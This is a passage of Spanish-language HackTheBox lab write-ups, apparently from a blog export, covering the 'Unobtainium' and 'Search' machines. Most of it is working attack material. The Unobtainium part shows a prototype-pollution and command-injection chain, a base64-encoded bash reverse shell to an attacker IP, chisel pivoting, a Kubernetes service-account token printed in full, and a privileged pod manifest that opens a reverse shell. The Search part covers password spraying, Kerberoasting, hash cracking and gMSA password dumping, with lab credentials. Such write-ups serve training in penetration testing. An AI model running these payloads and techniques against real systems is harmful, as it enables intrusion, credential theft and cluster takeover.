user = findUser(req.body.auth || {}); if (!user || !user.canUpload) { res.status(403).send({ok: false, error: 'Access denied'}); return; } filename = req.body.filename; root.upload(\"./\",filename, true); res.send({ok: true, Uploaded_File: filename}); }); app.post('/todo', (req, res) => { const user = findUser(req.body.auth || {}); if (!user) { res.status(403).send({ok: false, error: 'Access denied'}); return; } filename = req.body.filename; testFolder = \"/usr/src/app\"; fs.readdirSync(testFolder).forEach(file => { if (file.indexOf(filename) > -1) { var buffer = fs.readFileSync(filename).toString(); res.send({ok: true, content: buffer}); } }); }); app.listen(3000); console.log('Listening on port 3000...'); ``` Analizando un poco el código, de primeras busque sobre `google-cloudstorage-commands` parece ser que este repositorio es el código que se ejecuta por detrás que es importante para entender como funciona. [google-cloudstorage-commands](https://github.com/samradical/google-cloudstorage-commands/blob/master/index.js) Lo que deriva de una ejecución de comandos debido al uso de `child_process.exec` sin sanitizar los parámetros que provienen del usuario como ``inputDirectory``. Esta vulnerabilidad reside en el código index.js que obtuvimos con curl, en el método `_.merge` . ```js _.merge(message, req.body.message, { id: lastId++, timestamp: Date.now(), userName: user.name, }); ``` Si enviamos un message con propiedad como `__proto__` podríamos contaminar el prototipo de todos los objetos. En este link podemos ver un PoC. que indica el punto de ataque `root.upload(\"./\", filename, true);` lo que nos permitiría realizar inyección de comandos. [PortSwigger - prototype-pollution](https://portswigger.net/web-security/prototype-pollution) [SNYK-JS-GOOGLECLOUDSTORAGECOMMANDS-1050431](https://security.snyk.io/vuln/SNYK-JS-GOOGLECLOUDSTORAGECOMMANDS-1050431) Utilizando el `&` para después ejecutar una reverse shell, seria algo así: ```zsh echo -n \"bash -i >& /dev/tcp/10.10.14.20/443 0>&1\" | base64 echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC80NDMgMD4mMQ== | base64 -d | bash ``` Si ejecutamos el comando junto con la reverse shell, tardara un tiempo pero aun asi no la obtenemos, debemos como se menciona en el script tener permisos para subir, solo root puede subir archivos. ``` {name: 'felamos', password: 'Winter2021'}, {name: 'admin', password: Math.random().toString(32), canDelete: true, ``` Para esto enviaremos un mensaje en la seccion ``post messages`` por el binario obtainium y verificaremos que hayamos interceptado esa peticion por wireshark. ![Image](image-5.png) Como podemos ver se envia una peticion con el metodo PUT y el parametro message. Para modificar nuestros permisos como usuario felamos a \"canUpload\" a \"true\" enviaremos una peticion con PUT y en el parametro \"message\" agregamos el `__proto__` seguido del parametro que queremos que cambie. https://freedium.cfd/https://infosecwriteups.com/i-reproduced-a-10-000-bug-28466603e45e ```zsh curl -s -X PUT \"http://unobtainium.htb:31337/\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"message\":{\"__proto__\": {\"canUpload\": \"True\"}}}' -H \"Content-Type: application/json\" | jq ``` ![Image](image-6.png) Ahora que hemos modificado el parametro y podemos subir archivo podemos ejecutar la reverse shell a la direccion `http://unobtainium.htb/upload` ```zsh curl -s -X POST \"http://unobtainium.htb:31337/upload\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"filename\":\"& echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC80NDMgMD4mMQ== | base64 -d | bash\"}' -H \"Content-Type: application/json\" | jq { \"ok\": true, \"Uploaded_File\": \"& echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC80NDMgMD4mMQ== | base64 -d | bash\" } ``` ### Shell as webapp ![Image](image-7.png) Por la interfaz podemos darnos cuenta de que es contenedor en donde nos encontramos ``` ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 3: eth0@if10: mtu 1450 qdisc noqueue state UP group default link/ether 02:a9:d5:71:68:a2 brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 10.42.0.64/24 brd 10.42.0.255 scope global eth0 valid_lft forever preferred_lft forever ``` ``contrab -l`` ```zsh root@webapp-deployment-9546bc7cb-6r7sq:/etc/cron.d# cat clear-kubectl cat clear-kubectl * * * * * find / -name kubectl -exec rm {} \\; ``` ## Priv: Kubernetes Prototype Pollution | Lateral Movement Kubectl es la herramienta de línea de comandos para clústeres de Kubernetes. Se comunica con el servidor API del proceso maestro para realizar acciones en Kubernetes o solicitar datos. Los ``namespaces`` son una forma de organizar y aislar recursos dentro de un mismo clúster. Funcionan como \"particiones virtuales\" que permiten dividir el clúster en múltiples entornos lógicos, útiles para separar equipos, proyectos o entornos ```zsh ./akubectl get namespaces NAME STATUS AGE default Active 2y319d \\[-] kube-system Active 2y319d \\[-] kube-public Active 2y319d \\[-] kube-node-lease Active 2y319d \\[-] dev Active 2y319d \\[+] ``` Los ``pods`` es un grupo de uno o más contenedores que comparten recursos como almacenamiento y red, y que se ejecutan en la misma máquina virtual (nodo). ``` ./akubectl get pods -n dev NAME READY STATUS RESTARTS AGE devnode-deployment-776dbcf7d6-g4659 1/1 Running 6 (625d ago) 2y319d devnode-deployment-776dbcf7d6-7gjgf 1/1 Running 6 (625d ago) 2y319d devnode-deployment-776dbcf7d6-sr6vj 1/1 Running 6 (625d ago) 2y319d ``` Solo el namespace `dev` tuvimos acceso para listar los pods. ```zsh ./akubectl describe pods/devnode-deployment-776dbcf7d6-g4659 -n dev ``` ```d Name: devnode-deployment-776dbcf7d6-g4659 Namespace: dev Priority: 0 Service Account: default Node: unobtainium/10.10.10.235 Start Time: Mon, 29 Aug 2022 09:32:21 +0000 Labels: app=devnode pod-template-hash=776dbcf7d6 Annotations: Status: Running IP: 10.42.0.63 IPs: IP: 10.42.0.63 Controlled By: ReplicaSet/devnode-deployment-776dbcf7d6 Containers: devnode: Container ID: docker://93749fa961009fa8dd8ae44f3ab344ef93849ccbff1b67b4f99bc91589a9a05f Image: localhost:5000/node_server Image ID: docker-pullable://localhost:5000/node_server@sha256:e965afd6a7e1ef3093afdfa61a50d8337f73cd65800bdeb4501ddfbc598016f5 Port: 3000/TCP Host Port: 0/TCP State: Running Started: Mon, 14 Jul 2025 07:21:28 +0000 Last State: Terminated Reason: Error Exit Code: 137 Started: Fri, 27 Oct 2023 15:17:48 +0000 Finished: Fri, 27 Oct 2023 15:24:53 +0000 Ready: True Restart Count: 6 Environment: Mounts: /root/ from user-flag (rw) /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-ww6h2 (ro) Conditions: Type Status Initialized True Ready True ContainersReady True PodScheduled True Volumes: user-flag: Type: HostPath (bare host directory volume) Path: /opt/user/ HostPathType: kube-api-access-ww6h2: Type: Projected (a volume that contains injected data from multiple sources) TokenExpirationSeconds: 3607 ConfigMapName: kube-root-ca.crt Optional: false DownwardAPI: true QoS Class: BestEffort Node-Selectors: Tolerations: node.kubernetes.io/not-ready:NoExecute op=Exists for 300s node.kubernetes.io/unreachable:NoExecute op=Exists for 300s Events: ``` Podemos ver que este contenedor de kubernetes tiene la ip `10.42.0.63` y yo tengo la `10.42.0.64`. ![Image](image-8.png) Si le lanzamos un ping, vemos que tenemos conectividad con ese contenedor. ``` ping -c 1 10.42.0.63 PING 10.42.0.63 (10.42.0.63) 56(84) bytes of data. 64 bytes from 10.42.0.63: icmp_seq=1 ttl=64 time=0.138 ms --- 10.42.0.63 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.138/0.138/0.138/0.000 ms ``` https://hacktricks.boitatech.com.br/pentesting/pentesting-kubernetes ```zsh curl -s -X POST \"http://10.42.0.63:3000/upload\"; echo {\"ok\":false,\"error\":\"Access denied\"} curl -s -X POST \"http://10.42.0.63:3000/todo\"; echo {\"ok\":false,\"error\":\"Access denied\"} ``` ### Pivoting Port 3000 - Kali ``` ./chisel server --reverse -p 1234 ``` - Container ```bash ./chisel client 10.10.14.20:1234 R:3000:10.42.0.63:3000 ``` ## Shell as devnode ```zsh curl -s -X PUT \"http://127.0.0.1:3000/\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"message\":{\"__proto__\": {\"canUpload\": \"True\"}}}' -H \"Content-Type: application/json\"; echo {\"ok\":true} ``` ```zsh curl -s -X POST \"http://127.0.01:3000/upload\" -d '{\"auth\":{\"name\":\"felamos\",\"password\":\"Winter2021\"},\"filename\":\"& echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC80NDQgMD4mMQ== |base64 -d | bash\"}' -H \"Content-Type: application/json\" | jq { \"ok\": true, \"Uploaded_File\": \"& echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMC80NDQgMD4mMQ== |base64 -d | bash\" } ``` ![Image](image-9.png) ## Kubernetes Privileged Container Escape Los **Secrets** son objetos diseñados para almacenar y gestionar información sensible de manera segura, como contraseñas, tokens de API, claves SSH o certificados SSL. ```bash ./akubectl auth can-i get pods no ./akubectl auth can-i get namespaces no ``` Con el usuario devnode podemos listar los secrets. ```bash ./akubectl auth can-i get secrets -n kube-system yes ``` Ahora obtendremos los secretos iterando en cada uno de los namespaces, en este punto el usuario devnode no puede listar los namespaces pero el anterior usuario si puede y previamente ya lo habiamos obtenido, intentaremos aquellos namespaces que no pudimos acceder. ```ZSH ./akubectl get secrets -n kube-system {SNIP} c-admin-token-b47f7 kubernetes.io/service-account-token 3 70d {SNIP} ``` ```zsh ./akubectl describe secrets/c-admin-token-b47f7 -n kube-system ``` ``` Name: c-admin-token-b47f7 Namespace: kube-system Labels: Annotations: kubernetes.io/service-account.name: c-admin kubernetes.io/service-account.uid: 31778d17-908d-4ec3-9058-1e523180b14c Type: kubernetes.io/service-account-token Data ==== ca.crt: 570 bytes namespace: 11 bytes token: eyJhbGciOiJSUzI1NiIsImtpZCI6InRqSFZ0OThnZENVcDh4SXltTGhfU0hEX3A2UXBhMG03X2pxUVYtMHlrY2cifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLWI0N2Y3Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIzMTc3OGQxNy05MDhkLTRlYzMtOTA1OC0xZTUyMzE4MGIxNGMiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.fka_UUceIJAo3xmFl8RXncWEsZC3WUROw5x6dmgQh_81eam1xyxq_ilIz6Cj6H7v5BjcgIiwsWU9u13veY6dFErOsf1I10nADqZD66VQ24I6TLqFasTpnRHG_ezWK8UuXrZcHBu4Hrih4LAa2rpORm8xRAuNVEmibYNGhj_PNeZ6EWQJw7n87lir2lYcqGEY11kXBRSilRU1gNhWbnKoKReG_OThiS5cCo2ds8KDX6BZwxEpfW4A7fKC-SdLYQq6_i2EzkVoBg8Vk2MlcGhN-0_uerr6rPbSi9faQNoKOZBYYfVHGGM3QDCAk3Du-YtByloBCfTw8XylG9EuTgtgZA ``` Existe otra manera mas sencilla y es que el token se almacena en la ruta ``/run/secretes/kubernetes.io/serviceaccount`` ![Image](image-10.png) ``` ./akubectl auth --token \"eyJhbGciOiJSUzI1NiIsImtpZCI6InRqSFZ0OThnZENVcDh4SXltTGhfU0hEX3A2UXBhMG03X2pxUVYtMHlrY2cifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLWI0N2Y3Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIzMTc3OGQxNy05MDhkLTRlYzMtOTA1OC0xZTUyMzE4MGIxNGMiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.fka_UUceIJAo3xmFl8RXncWEsZC3WUROw5x6dmgQh_81eam1xyxq_ilIz6Cj6H7v5BjcgIiwsWU9u13veY6dFErOsf1I10nADqZD66VQ24I6TLqFasTpnRHG_ezWK8UuXrZcHBu4Hrih4LAa2rpORm8xRAuNVEmibYNGhj_PNeZ6EWQJw7n87lir2lYcqGEY11kXBRSilRU1gNhWbnKoKReG_OThiS5cCo2ds8KDX6BZwxEpfW4A7fKC-SdLYQq6_i2EzkVoBg8Vk2MlcGhN-0_uerr6rPbSi9faQNoKOZBYYfVHGGM3QDCAk3Du-YtByloBCfTw8XylG9EuTgtgZA\" can-i create pod yes ``` ### Malicious POD [kubernetes-pod-privilege-escalation#Pod1](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod1) [everything-allowed-exec-pod](https://github.com/BishopFox/badPods/blob/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml) Modificamos el archivo ``` apiVersion: v1 kind: Pod metadata: name: pwned labels: app: pentest spec: hostNetwork: true hostPID: true hostIPC: true containers: - name: pwned image: localhost:5000/node_server securityContext: privileged: true volumeMounts: - mountPath: /root/ name: getflag command: [ \"/bin/bash\"] args: [ \"-c\", \"/bin/bash -i >& /dev/tcp/10.10.14.20/443 0>&1;\" ] #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name volumes: - name: getflag hostPath: ``` ``` ./akubectl create -f pwn.yaml --token \"eyJhbGciOiJSUzI1NiIsImtpZCI6InRqSFZ0OThnZENVcDh4SXltTGhfU0hEX3A2UXBhMG03X2pxUVYtMHlrY2cifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLWI0N2Y3Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIzMTc3OGQxNy05MDhkLTRlYzMtOTA1OC0xZTUyMzE4MGIxNGMiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.fka_UUceIJAo3xmFl8RXncWEsZC3WUROw5x6dmgQh_81eam1xyxq_ilIz6Cj6H7v5BjcgIiwsWU9u13veY6dFErOsf1I10nADqZD66VQ24I6TLqFasTpnRHG_ezWK8UuXrZcHBu4Hrih4LAa2rpORm8xRAuNVEmibYNGhj_PNeZ6EWQJw7n87lir2lYcqGEY11kXBRSilRU1gNhWbnKoKReG_OThiS5cCo2ds8KDX6BZwxEpfW4A7fKC-SdLYQq6_i2EzkVoBg8Vk2MlcGhN-0_uerr6rPbSi9faQNoKOZBYYfVHGGM3QDCAk3Du-YtByloBCfTw8XylG9EuTgtgZA\" ``` ![Image](image-11.png) [peirates](https://github.com/inguardians/peirates)"},{"id":"search","title":"HTB - Search","description":"HTB - Search","date":"2025-07-12T16:17:34.000Z","tags":["HackTheBox","Hard","Kerberoasting","TGS","rpcclient","bloodhound","PFX","gMSA","GenericAll","Password-Spraying"],"authors":["r4cc0x"],"url":"/blog/search","content":"## Box Info | Name | Search | | :-------------------- | ---------------: | | Release Date | 07 Mar, 2020 | | OS | Windows | | Rated Difficulty | Hard | - Ping ``` ping -c 3 10.10.11.129 PING 10.10.11.129 (10.10.11.129) 56(84) bytes of data. 64 bytes from 10.10.11.129: icmp_seq=1 ttl=127 time=131 ms 64 bytes from 10.10.11.129: icmp_seq=2 ttl=127 time=132 ms 64 bytes from 10.10.11.129: icmp_seq=3 ttl=127 time=131 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.11.129 -oG allPorts nmap -sCV -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,8172,9389,49666,49675,49676,49707,49719 10.10.11.129 -oN targeted ``` ```zsh Nmap scan report for 10.10.11.129 Host is up (0.13s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Search &mdash; Just Testing IIS 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-12 14:13:27Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=research | Not valid before: 2020-08-11T08:13:35 |_Not valid after: 2030-08-09T08:13:35 443/tcp open ssl/http Microsoft IIS httpd 10.0 | ssl-cert: Subject: commonName=research | Not valid before: 2020-08-11T08:13:35 |_Not valid after: 2030-08-09T08:13:35 | tls-alpn: |_ http/1.1 | http-methods: |_ Potentially risky methods: TRACE |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. |_http-title: Search &mdash; Just Testing IIS |_http-server-header: Microsoft-IIS/10.0 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=research | Not valid before: 2020-08-11T08:13:35 |_Not valid after: 2030-08-09T08:13:35 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=research | Not valid before: 2020-08-11T08:13:35 |_Not valid after: 2030-08-09T08:13:35 |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=research | Not valid before: 2020-08-11T08:13:35 |_Not valid after: 2030-08-09T08:13:35 |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. 8172/tcp open ssl/http Microsoft IIS httpd 10.0 |_ssl-date: 2025-07-12T14:14:58+00:00; 0s from scanner time. |_http-title: Site doesn't have a title. | tls-alpn: |_ http/1.1 |_http-server-header: Microsoft-IIS/10.0 | ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH | Not valid before: 2020-04-07T09:05:25 |_Not valid after: 2030-04-05T09:05:25 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49707/tcp open msrpc Microsoft Windows RPC 49719/tcp open msrpc Microsoft Windows RPC Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-07-12T14:14:21 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` - Domain ```zsh echo \"10.10.11.129 search.htb research.search.htb\" | sudo tee -a /etc/hosts ``` - Web ![Image](image.png) Encontramos informacion sobre los nombres del team (posiblemente encontremos algun nombre valido para el dominio) ![Image](image-1.png) ```zsh cat users| grep -v \"Image\\|Manager\" | grep . ``` ``` Keely Lyons Dax Santiago Sierra Frye Kyla Stewart Kaiara Spencer Dave Simpson Ben Thompson Chris Stewart Hope Sharp ``` Es importante observar con atención una de las imágenes que se encuentran en el slide show que van cambiando (CTF Like) ![Image](image-2.png) Si hacemos zoom podemos ver lo que parece ser una credencial ``` hope.sharp:IsolationIsKey? ``` ### Enumeration Directory ```zsh gobuster dir -u http://10.10.11.129 -w /usr/share/wordlists/dirb/common.txt ``` ```zsh /certenroll (Status: 301) [Size: 154] [--> http://10.10.11.129/certenroll/] /certsrv (Status: 401) [Size: 1293] /css (Status: 301) [Size: 147] [--> http://10.10.11.129/css/] /fonts (Status: 301) [Size: 149] [--> http://10.10.11.129/fonts/] /Images (Status: 301) [Size: 150] [--> http://10.10.11.129/Images/] /images (Status: 301) [Size: 150] [--> http://10.10.11.129/images/] /index.html (Status: 200) [Size: 44982] /js (Status: 301) [Size: 146] [--> http://10.10.11.129/js/] /staff (Status: 403) [Size: 1233] ``` Volviendo encontramos un directorio interesante `staff` a demas de ``certsrv`` y ``certenroll`` El directorio certsrv se refiere al servicio web de inscripción de certificados dentro de los Servicios de Certificados de Active Directory. ![Image](image-3.png) Pero para entrar al directorio certsrv ocupamos de credenciales. ### Create users Tenemos suficientes usuarios y una credencial, pero en el AD es muy comun que el nombre de usuario tenga una estructura por ejemplo: {lastname}.{firstname} o {firstletter}.{lastname}. Para tener distintos nombres con distintas estructuras usaremos un script para generarlo y de ese modo encontrar usuarios validos dentro del dominio. https://github.com/urbanadventurer/username-anarchy ```zsh ./username-anarchy -i users > usernames.txt ``` ### Enumerate Users ```zsh nxc smb 10.10.11.129 -u usernames.txt -p '' --kerberos | tee ../output-kerb.txt ``` La estrucutra de los usernames es {firstname}.{lastname} Algunos usuarios aparecen como \"``FAILED``\" a diferencia de los ``UNKNOW``, llaman la atencion que probablemente sean usuarios validos por tener una respuesta distinta. ```zsh cat output-kerberos.txt | grep FAILED cat output-kerberos.txt | grep KDC_ERR_PREAUTH_FAILED | cut -d '\\' -f2 | cut -d ':' -f1 ``` ```zsh SMB 10.10.11.129 445 RESEARCH [-] search.htb\\keely.lyons: KDC_ERR_PREAUTH_FAILED SMB 10.10.11.129 445 RESEARCH [-] search.htb\\dax.santiago: KDC_ERR_PREAUTH_FAILED SMB 10.10.11.129 445 RESEARCH [-] search.htb\\sierra.frye: KDC_ERR_PREAUTH_FAILED ``` ``` keely.lyons dax.santiago sierra.frye hope.sharp ``` ### Passwords Spraying Realizamos un ataque `Password Spraying` que es probar una contraseña contra diferentes usuarios. ```zsh nxc smb 10.10.11.129 -u validusers -p 'IsolationIsKey?' --continue-on-success ``` ```zsh SMB 10.10.11.129 445 RESEARCH [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False) SMB 10.10.11.129 445 RESEARCH [-] search.htb\\keely.lyons:IsolationIsKey? STATUS_LOGON_FAILURE SMB 10.10.11.129 445 RESEARCH [-] search.htb\\dax.santiago:IsolationIsKey? STATUS_LOGON_FAILURE SMB 10.10.11.129 445 RESEARCH [-] search.htb\\sierra.frye:IsolationIsKey? STATUS_LOGON_FAILURE SMB 10.10.11.129 445 RESEARCH [+] search.htb\\hope.sharp:IsolationIsKey? ``` - Credentials ``` hope.sharp:IsolationIsKey? ``` ## Auth as Edgar.Jacobs ### Kerberoasting Attack (TGS) https://books.spartan-cybersec.com/cpad/vulnerabilidades-y-ataques-en-ad/kerberoasting/utilizando-impacket-getuserspns ```zsh nxc ldap 10.10.11.129 -u 'hope.sharp' -p 'IsolationIsKey?' --kerberoasting kerb.txt ``` ``` $krb5tgs$23$*web_svc$SEARCH.HTB$search.htb\\web_svc*$650bc56c2e926ece29da421b1cd7fc3b$9c53a2140cdee3b6cf73b479d63e242fe822ea4ad61e2bf817773fa774c544b5eab8089{SNIP...} ``` - Method 2 ```zsh impacket-GetUserSPNs 'search.htb/hope.sharp:IsolationIsKey?' -dc-ip 10.10.11.129 -request ``` ![Image](image-4.png) ### Crack Hash ```zsh john kerb.txt -w=/usr/share/wordlists/rockyou.txt ``` ```dtd web_svc:@3ONEmillionbaby ``` ### Enumerate More Users ```zsh rpcclient -U 'web_svc%@3ONEmillionbaby' 10.10.11.129 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' ``` ``` {SNIP...} ``` ### Password Spraying ```zsh nxc smb 10.10.11.129 -u moreusers -p '@3ONEmillionbaby' --continue-on-success ``` ``` SMB 10.10.11.129 445 RESEARCH [+] search.htb\\Edgar.Jacobs:@3ONEmillionbaby ``` Ahora tenemos una nueva credencial. ### BloodHound En este punto con credenciales podemos ejecutar `bloodhound-python` contra el dominio. ```zsh bloodhound-python -d search.htb -u web_svc -p '@3ONEmillionbaby' -ns 10.10.11.129 --zip -c All ``` ## Shell as Sierra.Frye ### SmbMap En lo que carga y subimos el archivo para vizualizar el bloodhound, con las nuevas credenciales de `edgar.jacobs` podemos listar los archivos compartidos por el servicio smb. ```zsh smbmap -H 10.10.11.129 -u 'edgar.jacobs' -p '@3ONEmillionbaby' --depth 10 ``` ![Image](image-5.png) ```zsh smbmap -H 10.10.11.129 -u 'edgar.jacobs' -p '@3ONEmillionbaby' -r 'RedirectedFolders$' --depth 10 ``` Podemos ver que el usuario `sierra.frye` tiene el archivo users.txt pero no tenemos permisos para vizualizarlo, quizas teniendo las credenciales de sierra.frye podamos vizualizarlo. ![Image](image-6.png) Para el caso de `edgar.jacobs` podemos descargar el archivo xlsx para poder ver su contenido. ```zsh smbmap -H 10.10.11.129 -u 'edgar.jacobs' -p '@3ONEmillionbaby' -r 'RedirectedFolders$' --depth 10 --download 'RedirectedFolders$//edgar.jacobs/Desktop/Phishing_Attempt.xlsx' ``` ### Phishing_Attempt.xlsx `libreoffice phishing.xlsx` ![Image](image-7.png) En la parte de abajo vemos que tiene un candado, quiere decir que necesitamos de una contraseña para poder vizualizar esas contraseñas almacenadas. Existe una manera muy sencilla y es cambiar la extension de ``xlsx -> zip`` abrimos el zip solo para vizualizar su contenido y seguido editaremos el sheet2.xml que es el que tiene las contraseñas protegidas. ![Image](image-8.png) Abrimos con algun coder y borramos la parte de abajo que seria lo que esta protegiendo. ![Image](image-9.png) Guardamos y volvemos a colocar la extension xlsx y de esa manera burlamos la password (lol). Ahora podemos mirar las contraseñas. ![Image](image-10.png) Haremos una lista, guardaremos por separado los usuarios y las contraseñas para realizar una validacion de usuarios y contraseñas. ```zsh nxc smb 10.10.11.129 -u usersxlsx -p passxlsx ``` ```dtd Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 ``` Validamos las credenciales. ```zsh nxc smb 10.10.11.129 -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' ``` ``` SMB 10.10.11.129 445 RESEARCH [+] search.htb\\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18 ``` ### Access to Staff Web Page Con las credenciales de sierra podemos descargar los archivos compartidos. ```zsh smbmap -H 10.10.11.129 -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -r 'RedirectedFolders$' --depth 10 ``` ```zsh smbmap -H 10.10.11.129 -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -r 'RedirectedFolders$' --depth 10 --download 'RedirectedFolders$//sierra.frye/Downloads/Backups/search-RESEARCH-CA.p12' ``` - staff.pfx - search-RESEARCH-CA.p12 ### Crack PFX ```zsh pfx2john staff.pfx > hashpfx ``` ```zsh john hashpfx -w=/usr/share/wordlists/rockyou.txt ``` ![Image](image-11.png) ```dtd misspissy ``` Con esta contraseña la podemos usar para importar nuestro certificado. ![Image](image-12.png) ### PowerShell Web ``` https://10.10.11.129/ ``` ![Image](image-13.png) Nos logeamos como `sierra.frye` y obtenemos una web shell ![Image](image-14.png) ## Shell as Tristan.Davies ### ReadGMSAPassword El usuario `sierra.frye` tiene un privilegio ``ReadGMSAPassword`` al usuario `BIR-ADFS-GMSA$`, en lo que enumeramos en bloodhound los anteriores usuarios no tenian nada interesante. ![Image](image-15.png) ## gMSA Dumpeamos. ```zsh python3 gMSADumper.py -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb Users or groups who can read password for BIR-ADFS-GMSA$: > ITSec BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f BIR-ADFS-GMSA$:aes256-cts-hmac-sha1-96:06e03fa99d7a99ee1e58d795dccc7065a08fe7629441e57ce463be2bc51acf38 BIR-ADFS-GMSA$:aes128-cts-hmac-sha1-96:dc4a4346f54c0df29313ff8a21151a42 ``` - Method 2 ```zsh nxc ldap 10.10.11.129 -u sierra.frye -p '$$49=wide=STRAIGHT=jordan=28$$18' --gmsa LDAP 10.10.11.129 389 RESEARCH [*] Windows 10 / Server 2019 Build 17763 (name:RESEARCH) (domain:search.htb) LDAPS 10.10.11.129 636 RESEARCH [+] search.htb\\sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18 LDAPS 10.10.11.129 636 RESEARCH [*] Getting GMSA Passwords LDAPS 10.10.11.129 636 RESEARCH Account: BIR-ADFS-GMSA$ NTLM: e1e9fd9e46d0d747e1595167eedcec0f PrincipalsAllowedToReadPassword: ITSec ``` #### GenericAll La maquina ``BIR-ADFS-GMSA$`` tiene un privilegio `GenericAll` hacia la maquina 